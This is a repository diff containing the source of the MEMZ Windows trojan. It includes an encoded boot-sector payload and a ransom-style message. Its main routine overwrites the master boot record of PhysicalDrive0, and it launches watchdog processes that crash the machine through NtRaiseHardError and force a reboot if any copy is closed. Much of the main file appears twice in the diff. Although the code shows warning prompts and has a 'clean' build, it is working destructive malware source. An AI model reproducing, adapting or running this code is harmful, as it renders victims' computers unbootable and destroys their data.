0x50, 0x24, 0x89, 0x1D, 0x0D, 0x3D, 0x1D, 0x0F, 0xD9, 0xFF, 0x06, 0xBC,
0xFF, 0x0F, 0x88, 0xFF, 0x10, 0x84, 0xFF, 0x26, 0x54, 0xCA, 0x21, 0xC0,
0xCA, 0x1A, 0xBA, 0x26, 0x22, 0xB0, 0x29, 0x1B, 0x09, 0x27, 0x2A, 0xD0,
0x18, 0x42, 0x4A, 0x06, 0x13, 0x7E, 0x82, 0x2B, 0x70, 0x18, 0x14, 0x18,
0x38, 0x2B, 0xC0, 0x19, 0x84, 0x09, 0x09, 0x09, 0x09, 0x39, 0x1C, 0x3E,
0x4F, 0x14, 0xBD, 0x33, 0x05, 0x50, 0x1C, 0x24, 0xA9, 0x15, 0x80, 0xF1,
0x15, 0x22, 0xFF, 0x16, 0x51, 0xFF, 0x17, 0x50, 0xFF, 0x18, 0x4D, 0xFF,
0x36, 0x7C, 0xD2, 0x41, 0x00, 0xFF, 0x41, 0xFF, 0xAD, 0x1B, 0x9C, 0x34,
0x42, 0xE0, 0x18, 0x80, 0x30, 0x1B, 0xE9, 0x37, 0x43, 0x30, 0x18, 0x84,
0x09, 0x70, 0x70, 0x09, 0x39, 0x43, 0x4D, 0x50, 0x1C, 0x8D, 0x33, 0x43,
0xD0, 0x1D, 0x43, 0xEE, 0x0C, 0x82, 0xF1, 0xF1, 0x1F, 0x24, 0xBA, 0x4F,
0x46, 0x55, 0xD1, 0x1E, 0x3B, 0xFF, 0x01, 0x5B, 0x37, 0x05, 0xAD, 0xFF,
0x16, 0x29, 0xFF, 0x4F, 0x30, 0x80, 0x19, 0xF0, 0xCA, 0x22, 0x8A, 0x26,
0x1A, 0xE0, 0x29, 0x22, 0xD9, 0x27, 0x3A, 0x70, 0x17, 0x23, 0x17, 0x89,
0x3B, 0x10, 0x20, 0x23, 0xC0, 0x30, 0x33, 0x90, 0x1F, 0x24, 0x0F, 0x81,
0x4B, 0x99, 0x1B, 0x4B, 0xBD, 0x04, 0x44, 0x01, 0x05, 0x40, 0x84, 0x06,
0x4B, 0xCC, 0x48, 0x2F, 0x50, 0xD0, 0x3F, 0xE2, 0x9D, 0x40, 0x81, 0x04,
0x2F, 0x01, 0xFF, 0x05, 0xAD, 0xFF, 0x06, 0xFA, 0xFF, 0x50, 0x80, 0xE9,
0x2A, 0x59, 0x27, 0x3A, 0x20, 0x26, 0x2A, 0xA6, 0x2A, 0x3A, 0x70, 0x23,
0x2A, 0xF3, 0x7D, 0x52, 0x80, 0x2C, 0x33, 0x6C, 0x3B, 0x80, 0x3F, 0x52,
0xE8, 0x10, 0x2B, 0xE8, 0x27, 0x53, 0x1F, 0x16, 0x80, 0xF9, 0x5B, 0x02,
0x04, 0x2C, 0x2A, 0x35, 0x53, 0x6F, 0x15, 0x80, 0xF1, 0x5B, 0x45, 0x05,
0x80, 0xF1, 0x2C, 0x7B, 0x31, 0x08, 0x4A, 0xFF, 0x57, 0x90, 0x97, 0x5C,
0xD1, 0x4F, 0x5D, 0x22, 0x4F, 0x87, 0x7E, 0x27, 0x12, 0x27, 0x4C, 0x46,
0xB8, 0x44, 0x5D, 0xC0, 0x05, 0x8E, 0x26, 0xB8, 0x24, 0x34, 0x24, 0xBF,
0x23, 0x34, 0x24, 0x00, 0x25, 0xB8, 0x44, 0x4C, 0x46, 0x5D, 0xC0, 0x08,
0x5D, 0xD4, 0x05, 0xA0, 0x24, 0x34, 0x24, 0x89, 0x23, 0xBF, 0x23, 0x89,
0x23, 0x34, 0x24, 0x4C, 0x46, 0x9D, 0x45, 0x7E, 0x27, 0x7E, 0x27, 0x70,
0x49, 0xF0, 0x27, 0x68, 0x28, 0x70, 0x29, 0x70, 0x69, 0x68, 0x48, 0xF0,
0x47, 0x5D, 0xFE, 0x06, 0x87, 0x68, 0x28, 0x7E, 0x27, 0x4C, 0x26, 0x9D,
0x25, 0x5E, 0x12, 0x04, 0x5E, 0x10, 0x04, 0x5E, 0x0E, 0x04, 0x85, 0x70,
0x29, 0x7E, 0x47, 0x4C, 0x46, 0x5E, 0x16, 0x0C, 0x83, 0xF0, 0x27, 0x7E,
0x27, 0x5E, 0x0A, 0x08, 0x81, 0xF0, 0x47, 0x5E, 0x0E, 0x08, 0x5E, 0x46,
0x04, 0x5E, 0x3C, 0x05, 0x84, 0x48, 0x70, 0x49, 0x68, 0x48, 0x5D, 0xF4,
0x66, 0x85, 0x70, 0x49, 0x99, 0x2C, 0x39, 0x2B, 0x5E, 0xC0, 0x06, 0x5E,
0xAA, 0x06, 0x83, 0x70, 0x29, 0x12, 0x27, 0x5D, 0xC8, 0x06, 0x81, 0x70,
0x49, 0x5E, 0xC6, 0x08, 0x81, 0x99, 0x2C, 0x5E, 0xD4, 0x04, 0x5E, 0xB6,
0x04, 0x87, 0x99, 0x2C, 0xFB, 0x2E, 0x24, 0x2E, 0x99, 0x2C, 0x5E, 0xC0,
0x0E, 0x5E, 0xCC, 0x08, 0x5F, 0x00, 0x04, 0x5E, 0xF6, 0x04, 0x83, 0x70,
0x29, 0x00, 0x2A, 0x5F, 0x0C, 0x06, 0x5E, 0xD2, 0x0C, 0x81, 0x00, 0x4A,
0x5E, 0xC0, 0x6C, 0xBC, 0x68, 0x48, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x63,
0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x68, 0x61, 0x73, 0x20,
0x62, 0x65, 0x65, 0x6E, 0x20, 0x74, 0x72, 0x61, 0x73, 0x68, 0x65, 0x64,
0x20, 0x62, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x45, 0x4D, 0x5A,
0x20, 0x74, 0x72, 0x6F, 0x6A, 0x61, 0x6E, 0x2E, 0x20, 0x4E, 0x6F, 0x77,
0x20, 0x65, 0x6E, 0x6A, 0x6F, 0x5F, 0xBC, 0x06, 0x8A, 0x4E, 0x79, 0x61,
0x6E, 0x20, 0x43, 0x61, 0x74, 0x2E, 0x2E, 0x2E
};
const size_t code1_len = sizeof(code1);
const size_t code2_len = sizeof(code2);
const size_t msg_len = sizeof(msg);
#endif

42
VCProject/MEMZ/data.h → WindowsTrojan/MEMZ/data.h
View file

@ -1,22 +1,22 @@
#pragma once
#include "memz.h"
extern const char *sites[];
extern const char *sounds[];
extern const size_t nSites;
extern const size_t nSounds;
#ifndef CLEAN
extern const unsigned char code1[];
extern const unsigned char code2[];
extern const size_t code1_len;
extern const size_t code2_len;
extern const unsigned char msg[];
extern const char *msgs[];
extern const size_t msg_len;
extern const size_t nMsgs;
#pragma once
#include "memz.h"
extern const char *sites[];
extern const char *sounds[];
extern const size_t nSites;
extern const size_t nSounds;
#ifndef CLEAN
extern const unsigned char code1[];
extern const unsigned char code2[];
extern const size_t code1_len;
extern const size_t code2_len;
extern const unsigned char msg[];
extern const char *msgs[];
extern const size_t msg_len;
extern const size_t nMsgs;
#endif

756
VCProject/MEMZ/main.cpp → WindowsTrojan/MEMZ/main.cpp
View file

@ -1,378 +1,378 @@
#include "memz.h"
#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...
HFONT font;
HWND dialog;
#endif
void main() {
#ifndef CLEAN
int argc;
LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
if (argc > 1) {
if (!lstrcmpW(argv[1], L"/watchdog")) {
CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);
WNDCLASSEXA c;
c.cbSize = sizeof(WNDCLASSEXA);
c.lpfnWndProc = WindowProc;
c.lpszClassName = "hax";
c.style = 0;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = 0;
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassExA(&c);
HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
} else {
// Another very ugly formatting
if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
This malware will harm your computer and makes it unusable.\r\n\
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
If you know what this malware does and are using a safe environment to test, \
press Yes to start it.\r\n\r\n\
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {
ExitProcess(0);
}
wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);
GetModuleFileName(NULL, fn, 8192);
for (int i = 0; i < 5; i++)
ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);
SHELLEXECUTEINFO info;
info.cbSize = sizeof(SHELLEXECUTEINFO);
info.lpFile = fn;
info.lpParameters = L"/main";
info.fMask = SEE_MASK_NOCLOSEPROCESS;
info.hwnd = NULL;
info.lpVerb = NULL;
info.lpDirectory = NULL;
info.hInstApp = NULL;
info.nShow = SW_SHOWDEFAULT;
ShellExecuteEx(&info);
SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);
ExitProcess(0);
}
HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
if (drive == INVALID_HANDLE_VALUE)
ExitProcess(2);
unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
// Join the two code parts together
int i = 0;
for (; i < code1_len; i++)
*(bootcode + i) = *(code1 + i);
for (i = 0; i < code2_len; i++)
*(bootcode + i + 0x1fe) = *(code2 + i);
DWORD wb;
if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
ExitProcess(3);
CloseHandle(drive);
HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if (note == INVALID_HANDLE_VALUE)
ExitProcess(4);
if (!WriteFile(note, msg, msg_len, &wb, NULL))
ExitProcess(5);
CloseHandle(note);
ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);
for (int p = 0; p < nPayloads; p++) {
Sleep(payloads[p].startDelay);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
}
for (;;) {
Sleep(10000);
}
#else // CLEAN
InitCommonControls();
dialog = NULL;
LOGFONT lf;
GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);
font = CreateFont(lf.lfHeight, lf.lfWidth,
lf.lfEscapement, lf.lfOrientation, lf.lfWeight,
lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,
lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,
lf.lfPitchAndFamily, lf.lfFaceName);
WNDCLASSEX c;
c.cbSize = sizeof(WNDCLASSEX);
c.lpfnWndProc = WindowProc;
c.lpszClassName = L"MEMZPanel";
c.style = CS_HREDRAW | CS_VREDRAW;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassEx(&c);
RECT rect;
rect.left = 0;
rect.right = WINDOWWIDTH;
rect.top = 0;
rect.bottom = WINDOWHEIGHT;
AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);
mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,
50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);
for (int p = 0; p < nPayloads; p++) {
payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,
(p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT,
mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);
SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
//CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
}
SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);
ShowWindow(mainWindow, SW_SHOW);
UpdateWindow(mainWindow);
CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
#endif
}
#ifndef CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == WM_CLOSE || msg == WM_ENDSESSION) {
killWindows();
return 0;
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
DWORD WINAPI watchdogThread(LPVOID parameter) {
int oproc = 0;
char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);
Sleep(1000);
for (;;) {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
PROCESSENTRY32 proc;
proc.dwSize = sizeof(proc);
Process32First(snapshot, &proc);
int nproc = 0;
do {
HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);
char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(hProc, fn2, 512);
if (!lstrcmpA(fn, fn2)) {
nproc++;
}
CloseHandle(hProc);
LocalFree(fn2);
} while (Process32Next(snapshot, &proc));
CloseHandle(snapshot);
if (nproc < oproc) {
killWindows();
}
oproc = nproc;
Sleep(10);
}
}
void killWindows() {
// Show cool MessageBoxes
for (int i = 0; i < 20; i++) {
CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);
Sleep(100);
}
killWindowsInstant();
}
void killWindowsInstant() {
// Try to force BSOD first
// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...
// This isn't even an exploit, it's just an undocumented feature.
HMODULE ntdll = LoadLibraryA("ntdll");
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {
BOOLEAN tmp1; DWORD tmp2;
((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);
((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);
}
// If the computer is still running, do it the normal way
HANDLE token;
TOKEN_PRIVILEGES privileges;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);
privileges.PrivilegeCount = 1;
privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);
// The actual restart
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
}
DWORD WINAPI ripMessageThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
UnhookWindowsHookEx(hook);
return 0;
}
#else // CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
PAINTSTRUCT ps;
HDC hdc;
if (msg == WM_ACTIVATE) {
if (wParam == NULL)
dialog = NULL;
else
dialog = hwnd;
} else if (msg == WM_DESTROY) {
ExitProcess(0);
} else if (msg == WM_COMMAND) {
if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
for (int p = 0; p < nPayloads; p++) {
if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);
// Most ugly formatting EVER
if (MessageBoxA(hwnd,
"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
Do you still want to enable it?",
"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {
SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);
}
}
}
}
} else if (msg == WM_PAINT) {
hdc = BeginPaint(hwnd, &ps);
SelectObject(hdc, font);
LPWSTR str;
LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";
FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,
L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);
TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));
TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);
EndPaint(hwnd, &ps);
} else {
return DefWindowProc(hwnd, msg, wParam, lParam);
}
return 0;
}
DWORD WINAPI keyboardThread(LPVOID lParam) {
for (;;) {
if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
enablePayloads = !enablePayloads;
if (!enablePayloads) {
RECT rect;
HWND desktop = GetDesktopWindow();
GetWindowRect(desktop, &rect);
RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);
EnumWindows(&CleanWindowsProc, NULL);
} else {
RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);
}
while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {
Sleep(100);
}
} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {
if (enablePayloads) {
for (int p = 0; p < nPayloads; p++) {
if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {
payloads[p].delay = ((PAYLOADFUNCTIONDEFAULT((*)))payloads[p].payloadFunction)(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);
}
}
}
}
Sleep(10);
}
return 0;
}
BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {
DWORD pid;
if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {
SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return TRUE;
}
#endif
#include "memz.h"
#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...
HFONT font;
HWND dialog;
#endif
void main() {
#ifndef CLEAN
int argc;
LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);
if (argc > 1) {
if (!lstrcmpW(argv[1], L"/watchdog")) {
CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);
WNDCLASSEXA c;
c.cbSize = sizeof(WNDCLASSEXA);
c.lpfnWndProc = WindowProc;
c.lpszClassName = "hax";
c.style = 0;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = 0;
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassExA(&c);
HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
} else {
// Another very ugly formatting
if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
This malware will harm your computer and makes it unusable.\r\n\
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
If you know what this malware does and are using a safe environment to test, \
press Yes to start it.\r\n\r\n\
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {
ExitProcess(0);
}
wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);
GetModuleFileName(NULL, fn, 8192);
for (int i = 0; i < 5; i++)
ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);
SHELLEXECUTEINFO info;
info.cbSize = sizeof(SHELLEXECUTEINFO);
info.lpFile = fn;
info.lpParameters = L"/main";
info.fMask = SEE_MASK_NOCLOSEPROCESS;
info.hwnd = NULL;
info.lpVerb = NULL;
info.lpDirectory = NULL;
info.hInstApp = NULL;
info.nShow = SW_SHOWDEFAULT;
ShellExecuteEx(&info);
SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);
ExitProcess(0);
}
HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
if (drive == INVALID_HANDLE_VALUE)
ExitProcess(2);
unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);
// Join the two code parts together
int i = 0;
for (; i < code1_len; i++)
*(bootcode + i) = *(code1 + i);
for (i = 0; i < code2_len; i++)
*(bootcode + i + 0x1fe) = *(code2 + i);
DWORD wb;
if (!WriteFile(drive, bootcode, 65536, &wb, NULL))
ExitProcess(3);
CloseHandle(drive);
HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if (note == INVALID_HANDLE_VALUE)
ExitProcess(4);
if (!WriteFile(note, msg, msg_len, &wb, NULL))
ExitProcess(5);
CloseHandle(note);
ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);
for (int p = 0; p < nPayloads; p++) {
Sleep(payloads[p].startDelay);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
}
for (;;) {
Sleep(10000);
}
#else // CLEAN
InitCommonControls();
dialog = NULL;
LOGFONT lf;
GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);
font = CreateFont(lf.lfHeight, lf.lfWidth,
lf.lfEscapement, lf.lfOrientation, lf.lfWeight,
lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,
lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,
lf.lfPitchAndFamily, lf.lfFaceName);
WNDCLASSEX c;
c.cbSize = sizeof(WNDCLASSEX);
c.lpfnWndProc = WindowProc;
c.lpszClassName = L"MEMZPanel";
c.style = CS_HREDRAW | CS_VREDRAW;
c.cbClsExtra = 0;
c.cbWndExtra = 0;
c.hInstance = NULL;
c.hIcon = 0;
c.hCursor = 0;
c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);
c.lpszMenuName = NULL;
c.hIconSm = 0;
RegisterClassEx(&c);
RECT rect;
rect.left = 0;
rect.right = WINDOWWIDTH;
rect.top = 0;
rect.bottom = WINDOWHEIGHT;
AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);
mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,
50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);
for (int p = 0; p < nPayloads; p++) {
payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,
(p%COLUMNS)*BTNWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*BTNHEIGHT + SPACE*(p/COLUMNS+1), BTNWIDTH, BTNHEIGHT,
mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);
SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);
CreateThread(NULL, NULL, payloads[p].payloadHost, &payloads[p], NULL, NULL);
//CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);
}
SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);
ShowWindow(mainWindow, SW_SHOW);
UpdateWindow(mainWindow);
CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) > 0) {
if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
#endif
}
#ifndef CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == WM_CLOSE || msg == WM_ENDSESSION) {
killWindows();
return 0;
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
DWORD WINAPI watchdogThread(LPVOID parameter) {
int oproc = 0;
char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);
Sleep(1000);
for (;;) {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
PROCESSENTRY32 proc;
proc.dwSize = sizeof(proc);
Process32First(snapshot, &proc);
int nproc = 0;
do {
HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);
char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);
GetProcessImageFileNameA(hProc, fn2, 512);
if (!lstrcmpA(fn, fn2)) {
nproc++;
}
CloseHandle(hProc);
LocalFree(fn2);
} while (Process32Next(snapshot, &proc));
CloseHandle(snapshot);
if (nproc < oproc) {
killWindows();
}
oproc = nproc;
Sleep(10);
}
}
void killWindows() {
// Show cool MessageBoxes
for (int i = 0; i < 20; i++) {
CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);
Sleep(100);
}
killWindowsInstant();
}
void killWindowsInstant() {
// Try to force BSOD first
// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...
// This isn't even an exploit, it's just an undocumented feature.
HMODULE ntdll = LoadLibraryA("ntdll");
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {
BOOLEAN tmp1; DWORD tmp2;
((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);
((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);
}
// If the computer is still running, do it the normal way
HANDLE token;
TOKEN_PRIVILEGES privileges;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);
privileges.PrivilegeCount = 1;
privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);
// The actual restart
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
}
DWORD WINAPI ripMessageThread(LPVOID parameter) {
HHOOK hook = SetWindowsHookEx(WH_CBT, msgBoxHook, 0, GetCurrentThreadId());
MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);
UnhookWindowsHookEx(hook);
return 0;
}
#else // CLEAN
